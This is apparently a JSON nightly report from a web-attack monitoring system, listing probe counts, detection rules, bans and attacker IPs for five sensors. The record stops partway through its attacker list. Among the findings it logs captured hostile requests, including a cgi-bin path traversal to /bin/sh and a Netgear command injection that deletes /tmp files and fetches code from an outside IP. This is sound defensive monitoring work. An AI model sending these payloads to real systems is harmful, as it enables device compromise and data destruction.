{
 "night": "2026-10-04",
 "window": {
  "start": "2026-10-03T18:00:00+02:00",
  "end": "2026-10-04T06:00:00+02:00"
 },
 "target": {
  "label": "Johannesburg, ZA",
  "lat": -26.2041,
  "lon": 28.0473
 },
 "generated_at": "2026-10-07T11:35:12Z",
 "totals": {
  "attacks": 1508,
  "edge_attacks": 1157,
  "edge_new_bans": 36,
  "new_bans": 70,
  "requests": 81725,
  "blocked_at_edge": 439,
  "active_bans": 27,
  "sensors": 5
 },
 "sensors": [
  {
   "id": "edge",
   "kind": "edge",
   "attacks": 1157,
   "new_bans": 36,
   "attacks_24h": 2810,
   "active_bans": 21,
   "categories": {
    "cms-probe": 904,
    "secret-probe": 231,
    "protocol": 12,
    "code-injection": 6,
    "behaviour": 2
   }
  },
  {
   "id": "web-1",
   "kind": "web",
   "attacks": 192,
   "new_bans": 9,
   "attacks_24h": 256,
   "active_bans": 2,
   "categories": {
    "cms-probe": 80,
    "secret-probe": 79,
    "scanner": 20,
    "protocol": 12,
    "code-injection": 1
   }
  },
  {
   "id": "web-2",
   "kind": "web",
   "attacks": 54,
   "new_bans": 8,
   "attacks_24h": 105,
   "active_bans": 0,
   "categories": {
    "cms-probe": 45,
    "protocol": 6,
    "code-injection": 1,
    "scanner": 1,
    "secret-probe": 1
   }
  },
  {
   "id": "web-3",
   "kind": "web",
   "attacks": 51,
   "new_bans": 7,
   "attacks_24h": 105,
   "active_bans": 2,
   "categories": {
    "cms-probe": 26,
    "secret-probe": 14,
    "code-injection": 4,
    "scanner": 4,
    "protocol": 3
   }
  },
  {
   "id": "web-4",
   "kind": "web",
   "attacks": 54,
   "new_bans": 10,
   "attacks_24h": 54,
   "active_bans": 2,
   "categories": {
    "cms-probe": 16,
    "secret-probe": 15,
    "code-injection": 14,
    "protocol": 7,
    "scanner": 2
   }
  }
 ],
 "categories": {
  "cms-probe": 1071,
  "secret-probe": 340,
  "protocol": 40,
  "scanner": 27,
  "code-injection": 26,
  "behaviour": 2
 },
 "findings": [
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 198,
   "addresses": 29,
   "sensor": "edge",
   "first": "2026-10-03T18:32:00+02:00",
   "method": "GET",
   "path": "/.env",
   "ip": "45.153.102.164"
  },
  {
   "severity": "critical",
   "rule": "Credential, state or dump file probe",
   "rule_id": "BW-SEC-02",
   "type": "credential-probe",
   "requests": 33,
   "addresses": 5,
   "sensor": "edge",
   "first": "2026-10-03T23:06:00+02:00",
   "method": "GET",
   "path": "/db.sql",
   "ip": "84.233.199.151"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 6,
   "addresses": 3,
   "sensor": "edge",
   "first": "2026-10-03T22:31:00+02:00",
   "method": "POST",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "ip": "103.46.186.148"
  },
  {
   "severity": "high",
   "rule": "Run of missing-page requests",
   "rule_id": "BW-BEH-01",
   "type": "behaviour",
   "requests": 2,
   "addresses": 2,
   "sensor": "edge",
   "first": "2026-10-04T03:37:00+02:00",
   "method": "GET",
   "path": "/credentials",
   "ip": "34.52.229.253"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 2,
   "addresses": 2,
   "sensor": "edge",
   "first": "2026-10-03T21:52:00+02:00",
   "method": "GET",
   "path": "/",
   "ip": "187.108.1.142"
  },
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 77,
   "addresses": 5,
   "sensor": "web-1",
   "first": "2026-10-03T18:28:00+02:00",
   "method": "GET",
   "path": "/.git/config",
   "ip": "45.156.87.186"
  },
  {
   "severity": "critical",
   "rule": "Credential, state or dump file probe",
   "rule_id": "BW-SEC-02",
   "type": "credential-probe",
   "requests": 2,
   "addresses": 1,
   "sensor": "web-1",
   "first": "2026-10-03T18:28:00+02:00",
   "method": "GET",
   "path": "/wp-config.php",
   "ip": "45.156.87.186"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 1,
   "addresses": 1,
   "sensor": "web-1",
   "first": "2026-10-04T01:29:00+02:00",
   "method": "GET",
   "path": "/autodiscover/autodiscover.json?[[[@]]]zdi/Powershell",
   "ip": "52.248.42.25"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 20,
   "addresses": 9,
   "sensor": "web-1",
   "first": "2026-10-03T18:02:00+02:00",
   "method": "GET",
   "path": "/"
  },
  {
   "severity": "medium",
   "rule": "CMS, admin or appliance probe",
   "rule_id": "BW-CMS-01",
   "type": "cms-probe",
   "requests": 55,
   "addresses": 8,
   "sensor": "web-1",
   "first": "2026-10-03T23:16:00+02:00",
   "method": "GET",
   "path": "//wp-includes/wlwmanifest.xml",
   "ip": "139.28.219.70"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 1,
   "addresses": 1,
   "sensor": "web-2",
   "first": "2026-10-03T23:27:00+02:00",
   "method": "POST",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "ip": "192.3.245.183"
  },
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 1,
   "addresses": 1,
   "sensor": "web-2",
   "first": "2026-10-04T02:09:00+02:00",
   "method": "GET",
   "path": "/.git/config",
   "ip": "102.220.161.87"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 1,
   "addresses": 1,
   "sensor": "web-2",
   "first": "2026-10-03T18:17:00+02:00",
   "method": "GET",
   "path": "/",
   "ip": "74.249.190.122"
  },
  {
   "severity": "medium",
   "rule": "CMS, admin or appliance probe",
   "rule_id": "BW-CMS-01",
   "type": "cms-probe",
   "requests": 38,
   "addresses": 10,
   "sensor": "web-2",
   "first": "2026-10-03T19:19:00+02:00",
   "method": "POST",
   "path": "/HNAP1/",
   "ip": "144.48.130.71"
  },
  {
   "severity": "medium",
   "rule": "PHP script probe",
   "rule_id": "BW-PHP-01",
   "type": "php-probe",
   "requests": 7,
   "addresses": 7,
   "sensor": "web-2",
   "first": "2026-10-03T18:35:00+02:00",
   "method": "GET",
   "path": "/admin/config.php",
   "ip": "103.146.203.111"
  },
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 14,
   "addresses": 4,
   "sensor": "web-3",
   "first": "2026-10-03T18:24:00+02:00",
   "method": "GET",
   "path": "/.env",
   "ip": "91.92.242.37"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 4,
   "addresses": 3,
   "sensor": "web-3",
   "first": "2026-10-03T19:29:00+02:00",
   "method": "POST",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "ip": "103.46.186.85"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 4,
   "addresses": 4,
   "sensor": "web-3",
   "first": "2026-10-03T18:15:00+02:00",
   "method": "GET",
   "path": "/",
   "ip": "20.83.164.196"
  },
  {
   "severity": "medium",
   "rule": "CMS, admin or appliance probe",
   "rule_id": "BW-CMS-01",
   "type": "cms-probe",
   "requests": 21,
   "addresses": 4,
   "sensor": "web-3",
   "first": "2026-10-03T19:28:00+02:00",
   "method": "GET",
   "path": "/owa/",
   "ip": "45.156.128.101"
  },
  {
   "severity": "medium",
   "rule": "PHP script probe",
   "rule_id": "BW-PHP-01",
   "type": "php-probe",
   "requests": 5,
   "addresses": 4,
   "sensor": "web-3",
   "first": "2026-10-03T19:31:00+02:00",
   "method": "GET",
   "path": "/owncloud/status.php",
   "ip": "45.156.128.104"
  },
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 15,
   "addresses": 3,
   "sensor": "web-4",
   "first": "2026-10-04T00:08:00+02:00",
   "method": "GET",
   "path": "/.git/config",
   "ip": "104.194.155.42"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 13,
   "addresses": 4,
   "sensor": "web-4",
   "first": "2026-10-04T00:23:00+02:00",
   "method": "POST",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "ip": "103.46.186.148"
  },
  {
   "severity": "critical",
   "rule": "Shell command injection",
   "rule_id": "BW-RCE-02",
   "type": "command-injection",
   "requests": 1,
   "addresses": 1,
   "sensor": "web-4",
   "first": "2026-10-04T01:46:00+02:00",
   "method": "GET",
   "path": "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//172.168.171.61:\u2026",
   "ip": "103.74.21.89"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 2,
   "addresses": 2,
   "sensor": "web-4",
   "first": "2026-10-04T02:01:00+02:00",
   "method": "POST",
   "path": "/mcp",
   "ip": "172.202.106.160"
  },
  {
   "severity": "medium",
   "rule": "CMS, admin or appliance probe",
   "rule_id": "BW-CMS-01",
   "type": "cms-probe",
   "requests": 10,
   "addresses": 2,
   "sensor": "web-4",
   "first": "2026-10-04T05:53:00+02:00",
   "method": "GET",
   "path": "//wp-includes/ID3/license.txt",
   "ip": "91.193.232.116"
  }
 ],
 "events": [
  {
   "t": "2026-10-03T18:15:00+02:00",
   "ip": "20.65.171.30",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-03T18:15:00+02:00",
   "ip": "20.83.164.196",
   "type": "attack-tool",
   "kind": "finding",
   "severity": "high",
   "path": "/",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-03T18:17:00+02:00",
   "ip": "74.249.190.122",
   "type": "attack-tool",
   "kind": "finding",
   "severity": "high",
   "path": "/",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-03T18:24:00+02:00",
   "ip": "91.92.242.37",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-03T18:24:00+02:00",
   "ip": "91.92.242.37",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.env",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-03T18:28:00+02:00",
   "ip": "45.156.87.186",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.git/config",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-03T18:28:00+02:00",
   "ip": "45.156.87.186",
   "type": "credential-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/wp-config.php",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-03T18:32:00+02:00",
   "ip": "45.153.102.164",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T18:32:00+02:00",
   "ip": "167.71.175.236",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T18:32:00+02:00",
   "ip": "206.189.225.181",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T18:32:00+02:00",
   "ip": "45.153.102.164",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.env",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T18:35:00+02:00",
   "ip": "103.146.203.111",
   "type": "php-probe",
   "kind": "finding",
   "severity": "medium",
   "path": "/admin/config.php",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-03T18:48:00+02:00",
   "ip": "170.64.214.139",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T19:03:00+02:00",
   "ip": "103.189.178.93",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T19:07:00+02:00",
   "ip": "178.128.151.198",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T19:18:00+02:00",
   "ip": "172.68.183.22",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T19:19:00+02:00",
   "ip": "144.48.130.71",
   "type": "cms-probe",
   "kind": "finding",
   "severity": "medium",
   "path": "/HNAP1/",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-03T19:23:00+02:00",
   "ip": "192.241.132.217",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T19:28:00+02:00",
   "ip": "45.156.128.101",
   "type": "cms-probe",
   "kind": "finding",
   "severity": "medium",
   "path": "/owa/",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-03T19:29:00+02:00",
   "ip": "103.46.186.85",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-03T19:29:00+02:00",
   "ip": "103.46.186.85",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-03T19:31:00+02:00",
   "ip": "45.156.128.104",
   "type": "php-probe",
   "kind": "finding",
   "severity": "medium",
   "path": "/owncloud/status.php",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-03T19:40:00+02:00",
   "ip": "34.31.120.130",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T19:41:00+02:00",
   "ip": "139.28.219.70",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-03T20:26:00+02:00",
   "ip": "45.148.10.95",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T20:28:00+02:00",
   "ip": "146.70.194.222",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-03T20:34:00+02:00",
   "ip": "193.32.162.155",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-03T20:34:00+02:00",
   "ip": "143.244.57.92",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-03T21:28:00+02:00",
   "ip": "85.204.70.94",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-03T21:37:00+02:00",
   "ip": "195.178.110.28",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-03T21:39:00+02:00",
   "ip": "193.32.204.199",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-03T21:48:00+02:00",
   "ip": "45.138.12.45",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-03T21:52:00+02:00",
   "ip": "187.108.1.142",
   "type": "attack-tool",
   "kind": "finding",
   "severity": "high",
   "path": "/",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T21:52:00+02:00",
   "ip": "82.102.18.222",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-03T21:52:00+02:00",
   "ip": "34.28.187.158",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-03T22:31:00+02:00",
   "ip": "103.46.186.148",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T22:31:00+02:00",
   "ip": "103.46.186.148",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T22:52:00+02:00",
   "ip": "193.32.162.155",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T23:06:00+02:00",
   "ip": "185.221.237.197",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T23:06:00+02:00",
   "ip": "84.233.199.151",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T23:06:00+02:00",
   "ip": "84.233.199.151",
   "type": "credential-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/db.sql",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T23:16:00+02:00",
   "ip": "139.28.219.70",
   "type": "cms-probe",
   "kind": "finding",
   "severity": "medium",
   "path": "//wp-includes/wlwmanifest.xml",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-03T23:23:00+02:00",
   "ip": "23.234.72.92",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T23:23:00+02:00",
   "ip": "154.54.100.190",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-03T23:27:00+02:00",
   "ip": "192.3.245.183",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-03T23:27:00+02:00",
   "ip": "192.3.245.183",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-03T23:53:00+02:00",
   "ip": "213.209.159.84",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T00:02:00+02:00",
   "ip": "193.32.162.156",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T00:07:00+02:00",
   "ip": "20.210.186.186",
   "type": "php-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T00:08:00+02:00",
   "ip": "104.194.155.42",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-4"
  },
  {
   "t": "2026-10-04T00:08:00+02:00",
   "ip": "104.194.155.42",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.git/config",
   "sensor": "web-4"
  },
  {
   "t": "2026-10-04T00:11:00+02:00",
   "ip": "111.90.180.172",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T00:15:00+02:00",
   "ip": "154.202.66.141",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T00:23:00+02:00",
   "ip": "103.46.186.148",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-4"
  },
  {
   "t": "2026-10-04T00:23:00+02:00",
   "ip": "103.46.186.148",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "sensor": "web-4"
  },
  {
   "t": "2026-10-04T00:29:00+02:00",
   "ip": "102.220.161.139",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T00:33:00+02:00",
   "ip": "45.153.102.164",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-4"
  },
  {
   "t": "2026-10-04T00:40:00+02:00",
   "ip": "82.197.69.56",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T00:51:00+02:00",
   "ip": "134.199.157.29",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T01:23:00+02:00",
   "ip": "102.220.161.139",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-04T01:25:00+02:00",
   "ip": "20.65.217.174",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T01:26:00+02:00",
   "ip": "40.74.212.136",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-4"
  },
  {
   "t": "2026-10-04T01:29:00+02:00",
   "ip": "52.248.42.25",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-04T01:29:00+02:00",
   "ip": "52.248.42.25",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/autodiscover/autodiscover.json?[[[@]]]zdi/Powershell",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-04T01:35:00+02:00",
   "ip": "161.132.49.125",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-4"
  },
  {
   "t": "2026-10-04T01:46:00+02:00",
   "ip": "103.74.21.89",
   "type": "command-injection",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-4"
  },
  {
   "t": "2026-10-04T01:46:00+02:00",
   "ip": "103.74.21.89",
   "type": "command-injection",
   "kind": "finding",
   "severity": "critical",
   "path": "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//172.168.171.61:\u2026",
   "sensor": "web-4"
  },
  {
   "t": "2026-10-04T02:01:00+02:00",
   "ip": "172.202.106.160",
   "type": "attack-tool",
   "kind": "finding",
   "severity": "high",
   "path": "/mcp",
   "sensor": "web-4"
  },
  {
   "t": "2026-10-04T02:02:00+02:00",
   "ip": "20.65.144.90",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-04T02:09:00+02:00",
   "ip": "102.220.161.87",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T02:09:00+02:00",
   "ip": "102.220.161.87",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T02:09:00+02:00",
   "ip": "102.220.161.87",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.git/config",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T02:32:00+02:00",
   "ip": "170.64.131.170",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T02:40:00+02:00",
   "ip": "45.45.237.97",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T02:48:00+02:00",
   "ip": "91.148.244.131",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T02:50:00+02:00",
   "ip": "216.218.206.66",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-04T02:55:00+02:00",
   "ip": "43.163.90.125",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-4"
  },
  {
   "t": "2026-10-04T03:18:00+02:00",
   "ip": "193.32.162.157",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T03:37:00+02:00",
   "ip": "34.52.229.253",
   "type": "behaviour",
   "kind": "finding",
   "severity": "high",
   "path": "/credentials",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T03:40:00+02:00",
   "ip": "103.59.161.219",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T03:46:00+02:00",
   "ip": "45.45.237.97",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T04:05:00+02:00",
   "ip": "35.238.129.244",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T04:15:00+02:00",
   "ip": "96.126.130.210",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T04:23:00+02:00",
   "ip": "130.12.180.117",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-4"
  },
  {
   "t": "2026-10-04T05:26:00+02:00",
   "ip": "196.189.236.67",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T05:43:00+02:00",
   "ip": "104.194.155.42",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T05:52:00+02:00",
   "ip": "94.154.43.125",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T05:53:00+02:00",
   "ip": "91.193.232.116",
   "type": "cms-probe",
   "kind": "finding",
   "severity": "medium",
   "path": "//wp-includes/ID3/license.txt",
   "sensor": "web-4"
  },
  {
   "t": "2026-10-04T05:54:00+02:00",
   "ip": "91.193.232.178",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-04T05:54:00+02:00",
   "ip": "173.239.213.16",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-04T05:54:00+02:00",
   "ip": "91.193.232.116",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-4"
  },
  {
   "t": "2026-10-04T05:54:00+02:00",
   "ip": "45.146.55.115",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-4"
  },
  {
   "t": "2026-10-04T05:55:00+02:00",
   "ip": "94.154.43.84",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T05:58:00+02:00",
   "ip": "94.154.43.129",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  }
 ],
 "attackers": [
  {
   "ip": "20.219.185.206",
   "country": "India",
   "cc": "IN",
   "city": "Pune",
   "lat": 18.5204,
   "lon": 73.8567,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 95,
   "first_seen": null,
   "last_seen": null,
   "sensors": [
    "edge"
   ],
   "notes": [
    "banned until Sun 07:01"
   ],
   "tags": [
    "hosting-provider",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Unattributed automated probe",
    "confidence": "low",
    "evidence": []
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-06"
   ]
  },
  {
   "ip": "34.52.229.253",
   "country": "Belgium",
   "cc": "BE",
   "city": "Brussels",
   "lat": 50.8476,
   "lon": 4.35717,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "253.229.52.34.bc.googleusercontent.com",
